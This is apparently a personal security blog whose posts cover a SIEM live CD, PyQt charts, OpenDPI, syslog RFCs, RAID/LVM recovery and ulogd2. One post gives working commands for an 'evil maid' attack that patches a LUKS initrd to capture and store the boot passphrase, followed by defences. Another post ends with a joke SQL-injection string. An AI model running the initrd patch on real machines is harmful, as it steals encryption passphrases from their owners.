Flux RSS

Saturday 6 February 2010

Creating a live cd for open source SIM Prelude and Suricata

I have started to work on a Live CD for Open Source tools like Prelude SIEM, and software like Suricata, Snort, OpenVAS to send alerts. The goal is to easily test these tools, register new agents, get some alerts and be able to correlate them etc. I also want to add some visualization tools, so this CD could maybe become a reference for security alert detection and report.

Prewikka

First, a few points on applications used:

  • Debian Live for building the CD. It's very easy, it's based on Debian, and it allows me to re-use some work I've done
  • Suricata IDS, which is a very promising project
  • Snort IDS, with the free signatures
  • OpenVAS to be able to generate alerts
  • Prelude SIEM is the key point: suricata, snort, syslog etc. will send alerts to Prelude, which has a database, a correlator, a web interface (Prewikka) etc.
  • Standard useful tools: nmap, scapy, wireshark, p0f, etc.

This first version is based on Debian Lenny and arch x86. Everything is based on packages (.debs) to make it easier to maintain, upgrade versions or add patches: most of the time, I just have to rebuild packages from squeeze or sid.

The build tools are:

  • Debian live (package name is live-helper, I'm running sid/unstable here)
  • About 2-3 GB of free space (including cache, chroot and image).
  • A local Debian repository for custom packages (I use reprepro)
  • (optional) a chroot or pbuilder for rebuilding packages (I use cowbuilder).

Building the CD

You need to be root for that. We'll assume you have created a container directory (for ex. LIVE_SIEM) and extracted the sources in that directory.

Configuration is done in the config subdir. Added packages are just named in packages lists (files in the config/chroot_local-packageslists/ directory). D-L is nice, since it respects dependencies so you add the name of the package and it should be enough.

Default window manager is LXDE, to have a good compromise between size, speed and features. You can change that in file config/chroot.

Default keyboard is qwerty

Just run:

* lh clean
* lh build

and wait for a few minutes. The first command cleans up the chroot and binary directories (keeping the cache), and the second will rebuild completely the cd (download required packages, install them in chroot, run hooks, create compressed image etc.). Clearly, this is not the fastest way of making changes and quickly rebuilding the ISO, and it can be quite boring if you have to test small changes .. Using individual helpers (See this page) may help.

After that, you should have a file called binary.iso in the directory.

Download

I've uploaded a very preliminary version of the iso here: http://live.nufw.org/dl/siem-live-20100205.iso

This iso has:

  • A qwerty keyboard
  • Prelude + syslog + snort configured and installed, started on boot
  • OpenVAS (server and client) installed but not started (due to the number of plugins, server can take several minutes to start ..)
  • Suricata 0.8 installed and basically configured to use all snort signatures. You have to start it manually, for ex.
sudo suricata -c /etc/suricata/suricata.yaml -i eth0

and look in /var/log/suricata/*.log for alerts

  • other tools like Scapy (hint: use ipython to use it in interactive mode), OpenSCAP libraries, etc.

Test

I don't like to reboot, so to test I use VirtualBox or qemu:

qemu -net tap -net nic -boot d -cdrom {build-root}/binary.iso -m 256

During the boot sequence, the live CD will automatically configure applications:

  • create databases
  • setup a default working configuration for most applications
  • create and register Prelude profiles for all applications supporting it
  • start X, and open a browser on the local Prewikka (default login is admin/admin)

SIEM live boot

Prewikka

What to do after boot ?

The live cd is running a syslog server, you can configure some servers / equipments to send logs and they will automatically be analyzed by Prelude.

You can connect to the http server to see the Prewikka interface (default login/pass is admin/admin).

To change the keyboard layout at runtime, use setxkbmap kb, where kb is the keyboard layout to use (for ex fr or de).

Next step ?

I'm waiting for ideas / contributors / whatever :) I'll update suricata with a recent version as soon as it will have support for Prelude, and other tools. Just reply to this post (or contact me) if you have any suggestion.

I'll publish the code in a git repository soon (and will update this post with the url of the repository).

Wednesday 28 October 2009

implementing the evil maid attack on linux with Luks

This month, Joanna Rutkowska implemented the "evil maid" attack against TrueCrypt [1].

This kind of attack can be done on any OS with disk encryption: when using whole-disk encryption, you have to infect to bootloader. Linux includes dm-crypt/LUKS, which has some nice features (including TKS1 and working encrypted suspend-to-disk). But how does it play with this attack ?

Sadly, the answer is: pretty bad. LUKS has no protection against this attack, and even requires a /boot partition in clear. Before looking at the possible solutions, we'll play with the /boot partition to see how simple the attack is.

Linux boot sequence basics

The boot sequence (See [2]) is the following:

  • System startup: the BIOS is loaded, searches for a boot medium, loads the MBR, and yields control to it.
  • Boot loader stage 1: the job of the primary boot loader is to find and load the secondary boot loader (stage 2)
  • Boot loader stage 2: its jobs is to search and load the Linux kernel and initial RAM disk (initrd) images.
  • Linux kernel: it starts by uncompressing itself, then mounts the initrd image. This image contains modules and scripts required to find the root filesystem. After the root fs is found, the kernel switches its / partition (using the pivot_root method) and lets init continue.
  • Init: the first task executed.
Hacking the ramdisk (for fun and profit)

While dm-crypt is embedded in the Linux kernel, no solution is offered for Pre-Boot authentication. This means that the Linux and initrd images are stored on a clear partition. The job is then only to edit the initrd image, find a way to capture the passphrase when typed, and store it for later use.

Editing the initrd image

The initrd image is stored in /boot, and is a compressed cpio image:

mkdir tmp
cd tmp
gunzip < ../initrd.img-2.6.30-2-686 |  cpio -i

Early crypto and root partition

(This part was tested on a Debian sid) The initrd image contains a hierarchy of directories:

$ ls
bin  conf  etc  init  lib  sbin  scripts

The interesting file is scripts/local-top/cryptroot. This script searches for the partition to decrypt, uses a secure program to ask the passphrase (aha) in a secure memory location, and calls cryptsetup to decrypt the device. The relevant section is:

if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
      $cryptkeyscript "$cryptkey" | $cryptcreate --key-file=- ; then
 	message "cryptsetup: cryptsetup failed, bad password or options?"
 	continue
fi

Here are the steps to do:

  • display the usual message, to avoid alerting the user:
message -n "$cryptkey"
  • read the answer, without echo:
read -s BLAH
  • save it for later use. This is a bit more "difficult", since you don't have access to the filesystem at this point, and the root fs is switched anyway after. However, it seems that the /dev partition (especially when using udev) it not remounted ... let's use it:
echo $BLAH >> /dev/.blah
  • decrypt the partition as usual. We just have to adapt the decryption line:
if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
     echo -n "$BLAH" | $cryptcreate --key-file=- ; then
  • finally, re-create the initrd image:
find ./ | cpio -H newc -o > initrd.cpio
gzip initrd.cpio
mv initrd.cpio.gz ../initrd.img-2.6.30-2-686

Test it

After a reboot, the boot sequence looks the same as usual and everything goes fine. Maybe except:

# cat /dev/.blah
secret

Next?

See how trivial this was ? The next step could be to get the infection process automatic, or to broadcast the passphrase in mDNS broadcasts or whatever :)

Possible solutions

The real protection is Trusted Platform Module (TPM). It's goal is to have a trusted path for the entire boot sequence (from power on, bios etc. to running OS), However, it raises concerns about its potential uses, especially for antitrust respect (Palladium?) or for the money-vampires of RIAA and friends (DRM?).

To protect against these attacks, the most basic protections can be pretty efficient (assuming you don't need a military-grade protection):

  • Set a password on your Bios, to avoid booting on USB, for ex.
  • Ensured the box can't be opened
  • Set (another) password on the bootloader, so people won't add init=/bin/bash
  • When encrypting your disks, don't forget the swap !
  • Always mount /boot as read-only, run a checksumming program like aide to detect modifications.
  • Don't forget the basics: set up good passwords, change them regularly, store them with a correct hash [3], always lock your screen, etc.

These suggestions won't cost you additional hardware, are pretty easy to do, and will at least raise your security by slowing down intrusions (which now requires to find a way to boot), and detect them easily (changed file, computer rebooted unexpectedly or opened etc.). And anyway, if someone has (physical) access to your computer for a good period of time, it's over ;)

Have fun !

Notes

[1] http://theinvisiblethings.blogspot.com/2009/10/evil-maid-goes-after-truecrypt.html

[2] http://www.ibm.com/developerworks/library/l-linuxboot/index.html

[3] To make PAM use sha512 instead of MD5, just add sha512 to the line containing password pam_unix.so in /etc/pam.d/common-password or the equivalent for your distro

Sunday 4 October 2009

animated charts in python and Qt

I'm currently trying to generated interactive (and animated) charts in Python + Qt. The wanted library would be:

  • portable: this is one of the reasons of the choice of PyQt
  • simple: same reason
  • interactive: I want to be able to select, for example, the slices of a pie chart. A signal of events like Qt's would be perfect
  • animated: this is useless, but looking at things like AnyChart or FusionCharts, the result is really nice !
  • light on dependencies: relying on tons of libs makes the project hard to maintain and not portable, especially for windows where there is not packaging and dependency system.
  • free software

A quick search gave me the following products:

  • matplotlib: mostly for scientific plots, but there is a nice number of options, a well-documented API.
  • pyQwt: Python bindings for Qwt. Again, it's more scientific plot than charts
  • cairoplot: projects looks dead (or in the "yeah, the project's not finished, but we're recoding it in $LANG to be faster" syndrome, which is more or less the same). It generates images, though item maps can be extracted. The name tells it, it uses Cairo.
  • pyCha: some nice charts, uses Cairo. Very simple API (not much options).
  • reportlab: not really for interactive applications, but it can generate charts (and images).
  • KD Charts: not tested. It looks nice, but the license is not free.
  • ChartDirector: not free

Globally, the result is quite a deception:

  • There is no immediate reply (yes, I'm lazy).
  • Cairo is nice for Linux projects, but is a pain to use on other platforms
  • There is nothing using Qt only, except PyQwt which cannot be used directly :/ This is surprising, especially given that Qt's API is really nice and almost offers the solution natively.
  • Charts libraries for web apps are easy to use, there seems to be nothing easy on desktop apps.

Custom version

This was pretty simple (at the beginning, at least): Qt provides two classes, QGraphicsView and QGraphicsScene, to draw objects. These classes are pretty good, and adding a PieChart, for ex, was only a matter of calculating the slices:

for d in data:
   (l,v) = d
   start_angle = sum
   span = (v*360 / self.current_sum)
   el = QGraphicsEllipseItem(0, - ELLIPSE_RADIUS, ELLIPSE_RADIUS, ELLIPSE_RADIUS)
   el.setStartAngle(start_angle*16)
   el.setSpanAngle(span*16)

To do the animation, just create a QTimer, and redraw the scene in the event handler. The setSpanAngle function can be use, for example, to display the slices regularly in 20 steps, drawing (360/20) degrees of the total Pie at each step:

current_step = (self.i+1) * (360/20)
if (current_step >= o._start_angle):
   o.setVisible(True)
   if current_step > o._start_angle + o._span_angle:
      o.setSpanAngle( o._span_angle * 16 )
   else:
      o.setSpanAngle( 16 * (current_step - o._start_angle) )

Using all features of Qt is pretty simple, like brushes to create a gradient etc. data are stored in a model, and catching events allows to redraw the scene smoothly when something is changed.

This solution is implemented in PyQt only (and could easily be in Qt only), has no extra dependency, and is reasonably fast. Using Qt objects natively allows to use events like hover, click in a very trivial way.

Code is stored in a git repository. I've named it Cutie Chart, which is a pretty bad pun (I'll say I'm almost sorry):

git clone http://git.wzdftpd.net/cutie-chart.git

The repository also contains animation on Bar Charts, scaling each bar progressively to its normal size.

Example of result:

Matplotlib version

Using matplotlib would simplify things a lot, and bring tons of existing classes to the projects. However, things may not be so easy.

matplotlib provides a class FigureCanvasQTAgg. This class is a Qt canvas, so it can be used as a widget.

You have to create a Figure, a subplot and draw the pie:

fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = fig.add_subplot(111)
self.axes.hold(False)
self.axes.plot([0.1, 0.1, 0.8, 0.8])
(patches, texts, autotexts) = self.axes.pie(self.data, explode=self.explode, labels=self.labels, colors=self.colors, autopct='%1.1f%%', shadow=True)

The animation is a bit trickier: changing the span angle is not possible. I've tried several options with no success (like using Transform etc.), until I decided to create a different animation, better suited for matplotlib. In this version, we add a dummy slice, to create the effect that each slice starts at 0% and grow to its proportion regularly. As previously, we use a QTimer:

s = sum(self.data)
i = self.i
self.anim_fracs[-1] = (s*(20-i)/i)

self.axes.pie(self.anim_fracs, colors=self.colors, labels=self.anim_labels, autopct='%1.1f%%')
self.draw()

Code will be committed in the same repository soon. I've uploaded the current file here

It works fine, and using matplotlib is nice, with many features and support classes (for ex the ability to create SVG or PDF, to have many other classes for charts etc). Matplotlib also handle the automatic placement of the legend, 3d effects, z-shape, which would take some time to add manually ;). However, the drawback is that the integration with Qt is limited, like the support of signals or interaction on objects.

Example of output:

Thursday 17 September 2009

Playing with OpenDPI

So, Ipoque has published its deep inspection engine under a free license (LGPLv3): OpenDPI This is always good news when a company decides to release source code to the community, so first of all thanks to Ipoque for this.

After downloading the source code on OpenDPI google project's page, I started to look at it.

Basically, the project looks quite unprepared for release (only a Makefile, no configure script - though no-one can be blamed for not using autotools -), but after looking at the code it seems not so bad:

  • the code is reasonably clean
  • it builds fine on x86 or x86_64 platforms
  • the code is provided with a decent list of identified protocols
  • the demo uses pcap files

There are a few minor annoyances:

  • the provided lib is a static lib ... building a shared library would be better !
  • the build system is pretty awful, rebuilding everything each time, without using deps, no install system etc.
  • no docs (looking at the demo file was sufficient to understand most of the function).
  • no correct website, forums or whatever. I'm sure it will get better in the future
  • pcap only

This last point was the most annoying to me, so I decided to rewrite a daemon using the NFQUEUE target. While I could have used the nfqueue-bindings, I decided to use C this time: it was simpler ! I only had to recode the open/close/runloop functions to use nfqueue, extract the packet from the nfqueue callback, and use the exact same callback as for pcap :)

Here is the relevant parts of the interesting code:

static int _nfq_cb(struct nfq_q_handle *qh,
		    	 struct nfgenmsg *nfmsg,
			 struct nfq_data *nfad, void *data)
{
       [...]
	struct nfqnl_msg_packet_hdr *ph = nfq_get_msg_packet_hdr(nfad);

	if (ph)
		id = ntohl(ph->packet_id);

	payload_len = nfq_get_payload(nfad, &payload);
	iph = (struct iphdr*)payload;

	ret = nfq_get_timestamp(nfad, &tv);
	time =
		((uint64_t) tv.tv_sec) * detection_tick_resolution +
		tv.tv_usec / (1000000 / detection_tick_resolution);

	// process the packet
	packet_processing(time, iph, payload_len, payload_len);

	nfq_set_verdict(qh, id, NF_ACCEPT, 0, NULL);

	return 0;
 }

The proof-of-concept code works fine. As seen on this discussion, maybe Ipoque folks would be interested in a contribution :D No netfilter integration is needed, just playing with nfqueue + mark for filtering should be enough for most cases.

The code is not yet published, because it doesn't do anything useful yet (just try to identify and follow protocols and flows). If you're interested, contact me (remove the _ signs).

Tuesday 25 August 2009

Planet INL is back

Planet INL, le Planet non officiel des salariés d'INL, est de retour !

Wednesday 10 June 2009

Hadopi .. FAIL

Il y a des fois, on a encore envie de croire en la justice.

Ca doit certainement être un coup des gars planqués en embuscade derrière les rideaux. Ou pas.

Monday 1 June 2009

LinkedIn group for Prelude

I've just created a LinkedIn group for Prelude IDS.

All Prelude users are welcome to join the Prelude IDS group to stay in touch with other Prelude users, use the forums, get news etc.

Wednesday 27 May 2009

New Syslog RFCs

Several new RFCs for syslog have been issued in March:

So what are the improvements since the previous RFC (3614), especially in RFC5424 [1]:

  1. In section 5.1, "Minimum Required Transport Mapping":
    All implementations of this specification MUST support a TLS-based transport as described in RFC5425.
    Yay ! So they discovered TLS, that's great. Especially since RFC 5425 supports certificates authentication (section 4.2.1), certificate path validation, fingerprints, etc.
  2. Improved timestamps (Section 6.2.3) with supports for milliseconds, time zones, UTC offsets
  3. Section 6.3 describes structured data (name-value pairs)
  4. Section 7: Structured Data IDs
    This allows using an enterprise ID (registered to the IANA) for the structured data elements

However, nothing really useful on reliability (resending events, making sure they were delivered, etc.) except the very poor (and useless) section 8.5, which only acknowledges the lack of support :/ Well, Prelude IDS can do that pretty good.

Also, nothing on taxonomy, though it may be improved with structured data. However, it would require a good definition of events, formats etc, and given the current state of CEE, which is quite dead (3 mails on the list so far this year), it won't improve .. There is something to be done here.

Notes

[1] Some of the features (like TLS) are already present in good implementations of syslog (like rsyslog).

Wednesday 20 May 2009

New GPG Key

Partly because of the latest theoretical attack against the SHA-1 digest algorithm (details), I created a new GPG key:

sec   4096R/F1393998 2009-05-10
uid                  Pierre Chifflier <chifflier@gmail.com>
uid                  Pierre Chifflier <chifflier@inl.fr>
uid                  Pierre Chifflier <pollux@debian.org>
uid                  pollux <pollux@wzdftpd.net>
uid                  Pierre Chifflier <chifflier@cpe.fr>

It's signed with my old key 0x8D5F40CB, uploaded to keyservers, and will replace my old key.

Sunday 3 May 2009

libnetfilter-{queue,log} bindings release

I just released nfqueue-bindings 0.2 and nflog-bindings 0.1. Despite the difference of versions, functions are almost the same :)

Here is a short diff since previous version:

Add af_family argument to bind operations (allow IPv6 binds)
Add notes on set_queue_maxlen requiring a kernel >= 2.6.20
bugfix: use queue number when creating queue
bugfix: really link Perl binding to Perl library 
Fix cmake warning

Get them on nfqueue-bindings and nflog-bindings.

Tuesday 14 April 2009

Chacun ses priorités

Un post en français, une fois n'est pas coutume.

En cette période, les libertés individuelles sont sacrifiées au nom de l'interêt de quelques majors décrépies et vieillissantes, pour confier a des sociétés privées le droit d'effectuer des jugements rapide et remettant au passage en cause le principe d'innocence présumée. Autant l'idée de limiter le téléchargement illégal est compréhensible, autant balancer des lois débiles l'est moins (certains diraient même que le QI d'une ministre est comparable à celui d'Homer Simpson ..).

hadopi[1]

LA CNIL a d'ailleurs été exclue, grâce au président de séance !

L'UMP vient d'illustrer encore une fois le fait que dans leur monde l'argent prime sur tout, en repoussant une loi sur l'inceste pour faire revoter hadopi.

La conclusion de la députée UMP Arlettre Grosskost, cosignataire de cette proposition de loi, est consternante: "Je pense qu'il y a quand même des priorités, mais que voulez-vous…"

En effet, que demander de plus ..

Notes

[1] non, le wifi d'à côté

Friday 6 February 2009

Vulnerabilities (phpbb, squirrelmail)

Just after phpbb website has been compromised (see the detailed explication on this blog, another big problem just appeared, this time on squirrelmail:

SECURITY: Plugins Security Alert
Feb 05, 2009 by Paul Lesniewski
 	We are sorry to announce that we've had a security breach with our plugins system. An attacker uploaded at least
       four modified plugin packages, which we have since rectified. If you have downloaded any of the following
       plugins since January 17, 2009, you should immediately replace them (download them again):
AnnotateMore Server and Mailbox Annotations version 0.2
CAPTCHA version 1.1
Change LDAP Password version 2.2
Sieve Mail Filters version 1.9.7

ouch ! Squirrelmail does not give much details on the impact, but given that these plugins can touch passwords, that can be very bad ...

Tuesday 30 December 2008

Creating a rogue CA certificate

Today was given a nice presentation at CCC, entitled MD5 considered harmful today: Creating a rogue CA certificate.

It explains that, despite being broken since several years MD5 is still used is some important CA. Using this attack, they were able to generate a rogue CA certificate, and so were able to issue certificates which are marked as trusted by all browsers. As a result, the security of some websites like banks or e-commerce could be severely compromised !

So it seems that, unlike people promising the end of the world (like Dan Kaminsky at BlackHat 2008, Kris Kapersky at HITB, and Robert E. Lee and Jack C. Louis at T2 and Sec-T), this one could really lead to some serious consequences.

Congrats to them !

Solutions:

  • Ban MD5 and such certificates (like those issued by RapidSSL, even in 2008)
  • For CA implementations, randomize the serial of issued certificates could help mitigate the problem

Links:

Friday 26 December 2008

Restoring data from raid + lvm disks

If you are, like me, using this kind of layout for your disks:

disks => raid1 => lvm (encrypted or not) => partitions => filesystems

(Remember never to use XFS with this layout, unless you want to be sure to loose data - XFS still has problems with the 4k stack. Also, do not use XFS if you are not using a power supply. Oh, well, remember not to use to XFS at all ...)

This setup should ensure you to keep your data safe if one of the disk crashes. Good ! But what happens if you want to take one of the disks and mount it elsewhere (for ex. with an external USB converter) ? You have to re-create the FS stack manually, which can be quite tricky, so I post the commands here:

0 - find your disk partitions layout

# fdisk -l /dev/sdb
Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *           1         122      979933+  fd  Linux raid autodetect
/dev/sdb2             123       14946   119073780   fd  Linux raid autodetect

1 - Create a (degraded) raid array

# mdadm --assemble --run /dev/md0 /dev/sdb2
mdadm: /dev/md0 has been started with 1 drive (out of 2).

2 - Scan and create the LVM volume group

 # lvmdiskscan |grep md
 /dev/md0   [      113.56 GB] LVM physical volume
 # vgscan
 Reading all physical volumes.  This may take a while...
 Found volume group "raid1" using metadata type lvm2
 # lvscan |grep raid1
 inactive          '/dev/raid1/root' [20.00 GB] inherit
 inactive          '/dev/raid1/opt' [15.00 GB] inherit
 inactive          '/dev/raid1/pollux' [78.55 GB] inherit

Before the volume group can be used, it has to be activated.

 # vgchange raid1 -a y
 3 logical volume(s) in volume group "raid1" now active

If one of the volumes is encrypted, you have to play with cryptsetup

 # cryptsetup luksOpen pcrypt /dev/raid1/pollux

3 - mount volumes

 mount /dev/raid1/root /mnt

x - clean up the mess

It's better to close properly the cryt, lvm, and raid devices before removing the disk.

 # umount /mnt
 # cryptsetup luksClose pcrypt
 # vgchange raid1 -a n
 0 logical volume(s) in volume group "raid1" now active
 # mdadm --stop /dev/md0
 mdadm: stopped /dev/md0

Happy Christmas, Hanukkah, Kwanzaa, Solstice, Insert-Favorite-Holiday, whatever !

Wednesday 3 December 2008

ulogd2: the new userspace logging daemon for netfilter/iptables (part 3)

Installation

If you've followed the previous article, you now have a working ulogd2 installation. We will now explore the way data are stored in the database, and the default SQL schema provided with ulogd2.

SQL schema, basics

The SQL schema ? Not really, only the default one. Ulogd2 uses stored procedures and views to create an abstraction layer between the C code and the real storage of the data (the tables in the SQL database). The basics are the following:

Inserting data using the "INSERT" keyword is fast, but requires the application to know the SQL schema. An update of the SQL part will need an update of the C code, which is not very handy. So instead of using:

INSERT INTO tablename (field1,field2,...) VALUES (1,2,...);

We will create a stored procedure (in this example, we use PostgreSQL PL/pgSQL syntax):

CREATE OR REPLACE FUNCTION INSERT_PACKET_FULL(
               IN value11 integer,
               ...)
RETURNS bigint AS $$
DECLARE
       t_id bigint;
DECLARE
               t_id := INSERT INTO tablename (field1,field2,...) VALUES ($1,$2,...);
               RETURN t_id;
END
$$ LANGUAGE plpgsql SECURITY INVOKER;

Inserting data can now be done, using:

SELECT INSERT_PACKET_FULL(1,2,3,...);

So, we have succeeded into transforming a fast and single (and simple) query into something slower and more complex, great. But why ?

Pros:

  • C and SQL code independence: now we can change the SQL part without updating the C code
  • The SQL schema can be specific to the database used, and use the specific data types. For ex., PostgreSQL provides native support for IP and MAC addresses (using the inet and macaddr types) while MySQL does not, so we used binary types.
  • SQL schema is easy to extend for specific needs or applications: you just need to add a new table, linked to the main table using the unique ID of the packet. This won't affect ulogd2.
  • Retrieving data is also easier for applications (like NuLog, since the schema is hidden behind views (or stored procedures).
  • You have a finer control on what is done with the data

Cons:

  • Slower
  • Harder to read
  • Some databases do not have stored procedures (for ex. sqlite)

Default SQL schema (many tables)

Unlike the first version of ulogd, the default SQL schema provided with ulogd2 splits the data from the packets into several tables, each table containing data for a protocol. There are tables for IP (common fields for all packets), TCP, UDP, ICMP, ICMPv6, and since recently, SCTP. MAC addresses are also stored in a different table.

Global picture:

The provides a "cleaner" SQL schema than the "all-in-one-table" from the previous version, but at the cost of performance: each new packet will cause several insertions into different tables, and retrieving data will require to fetch data from several tables (using JOINs). This is, however, better space-efficient, since less data are stored (for ex, the MAC address is stored only once, and identified by a unique ID in the main table).

There are several views provided with this schema:

Each view is defined to fetch data from several tables:

CREATE OR REPLACE VIEW view_tcp AS
       SELECT * FROM ulog2 INNER JOIN tcp ON ulog2._id = tcp._tcp_id;

Even the "big" table ulog is a view, combining data from all tables:

CREATE OR REPLACE VIEW ulog AS
       SELECT _id,
       oob_time_sec,
       ...
       FROM ulog2 LEFT JOIN tcp ON ulog2._id = tcp._tcp_id LEFT JOIN udp ON ulog2._id = udp._udp_id
               LEFT JOIN icmp ON ulog2._id = icmp._icmp_id
               LEFT JOIN mac ON ulog2.mac_id = mac._mac_id
               LEFT JOIN hwhdr ON ulog2._id = hwhdr._hw_id
               LEFT JOIN icmpv6 ON ulog2._id = icmpv6._icmpv6_id;

This way, the application can quickly know, for ex, the number of different TCP ports used for destination and the number of packets using these ports:

SELECT tcp_dport,count(*) from view_tcp GROUP BY view_tcp.tcp_dport;
  tcp_dport | count 
  ===================
         80 |    39
        443 |     2

This schema should be used when your insertion rate is not too high (you are not CPU-bound).

Flat SQL schema

The default schema will work for most installations. However, if you have are logging data on a fast link, you may have performance problems. Assuming the problems come from the CPU, one solution is to change the SQL schema to a flat one (all in one table).

The flat schema is not yet written, but will shortly be submitted to ulogd2.

Please note that if the performance problem does not come from the CPU, it is very likely to come from the disks performance, in this case you will have to do some DB optimizations ...

Supported databases

Currently supported databases are MySQL and PostgreSQL. sqlite does not work, since it does not support stored procedures.

I have also recently submitted a new output plugin using the libdbi database abstraction layer, which brings support for Firebird, FreeTDS (MS-SQL and Sybase), Ingres, and Oracle. It also supports MySQL and PostgreSQL, but there are specific plugins for those 2.

The DBI plugin is not designed to replace all other plugins, since it can't use the DB-specific API, for ex the asynchronous API for PostgreSQL.

That's all for the database overview ! Now let's just hope that the (in)famous user "OR DROP DATABASE ulog; --" does not try to log anything ;)

References